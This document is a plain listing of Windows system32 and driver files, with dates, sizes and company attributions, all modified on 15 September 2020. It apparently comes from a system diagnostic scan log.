2020-09-15 17:42 - 2020-09-15 17:42 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001488384 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001473024 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001472824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 001426944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001414144 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocoreworker.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 001400208 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001393480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2020-09-15 17:42 - 2020-09-15 17:42 - 001378568 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputHost.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001337176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryPS.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001329664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001261056 _____ (Microsoft Corporation) C:\WINDOWS\system32\directml.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001209344 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001209096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 001198288 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 001191592 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001145344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001126488 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001104384 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001094472 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001092392 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001089344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 001070080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001059328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001046528 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2020-09-15 17:42 - 2020-09-15 17:42 - 001044880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001028288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001027344 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001009664 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001008696 _____ (Microsoft Corporation) C:\WINDOWS\system32\propsys.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000999744 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000978760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000976680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000935936 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000913776 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000908800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000903992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000887296 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2020-09-15 17:42 - 2020-09-15 17:42 - 000864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000843376 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000827912 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000799544 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.applicationmodel.datatransfer.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000795136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000755200 _____ (Microsoft Corporation) C:\WINDOWS\system32\WlanMediaManager.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000753152 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.immersiveshell.serviceprovider.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000725608 _____ (Microsoft Corporation) C:\WINDOWS\system32\StateRepository.Core.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000707016 _____ C:\WINDOWS\system32\TextShaping.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000705560 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000705024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000677888 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplicationFrame.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000647480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000639928 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000635824 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000634240 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp_win.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000614912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000603464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000596992 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000586752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000583168 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000573752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000566272 _____ (Microsoft Corporation) C:\WINDOWS\system32\usosvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000559616 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000531448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000507904 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000502592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2020-09-15 17:42 - 2020-09-15 17:42 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\FWPUCLNT.DLL
2020-09-15 17:42 - 2020-09-15 17:42 - 000491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cldflt.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000489984 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000488960 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000485888 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000477496 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000455480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000454960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Lights.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000418816 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000403768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000399872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000395264 _____ (Microsoft Corporation) C:\WINDOWS\system32\licensingdiag.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000390144 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppLockerCSP.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovs.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000381952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000380728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msrpc.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000378368 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationControllerPS.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000374072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000373560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthAgent.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000367616 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000332288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000322560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmWmiPl.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000322376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msquic.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateDeploymentProvider.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000309248 _____ (Microsoft Corporation) C:\WINDOWS\system32\smbwmiv2.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000306176 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore6.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\directxdatabaseupdater.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000272384 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000269624 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000265728 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000260920 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\DesktopSwitcherDataModel.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000259888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000249664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000242176 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgiadaptercache.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000231424 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallServiceTasks.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000230392 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000230376 _____ (Microsoft Corporation) C:\WINDOWS\system32\IPHLPAPI.DLL
2020-09-15 17:42 - 2020-09-15 17:42 - 000228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.CapturePicker.Desktop.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000219648 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000214016 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Win32CompatibilityAppraiserCSP.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000208696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000186472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000183112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msgpioclx.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000180040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wfplwfs.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000180024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAuto.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000169456 _____ (Microsoft Corporation) C:\WINDOWS\system32\KerbClientShared.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000167880 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidpolicyconverter.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000147256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000143104 _____ (Microsoft Corporation) C:\WINDOWS\system32\profapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000142336 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\CustomInstallExec.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000136704 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredDialogBroker.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GraphicsCapture.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000132928 _____ (Microsoft Corporation) C:\WINDOWS\system32\oemlicense.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000132728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptcatsvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssitlb.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000126976 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Utilman.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000118072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthProxyStub.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000117048 _____ (Microsoft Corporation) C:\WINDOWS\system32\icfupgd.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000116024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsiCx.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\dab.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcsvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000094208 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwm.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditBufferTestHook.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManMigrationPlugin.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\UsoClient.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidsvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000077312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntlanman.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcsvc6.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000069752 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000068928 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\msscntrs.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000064824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthHost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000064008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmRes.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.SystemId.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000059448 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryCore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagnosticdataquery.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCShellCommonProxyStub.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmprovhost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\WordBreakers.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAgent.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidtel.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidcertstorecheck.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\applockerfltr.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000017216 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmplpxy.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimg32.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 006193664 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 005776544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 004592136 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 003847680 _____ (Microsoft Corporation) C:\WINDOWS\system32\tellib.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 003436544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 002647040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 002103704 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 002102784 _____ (Microsoft Corporation) C:\WINDOWS\system32\windowsudk.shellcommon.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001924608 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001905664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcDesktopMonSvc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001766912 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdprt.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001548288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\system32\TaskFlowDataEngine.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001514496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001277440 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001257984 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001140928 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001114112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001030656 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001021952 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000992768 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000951808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
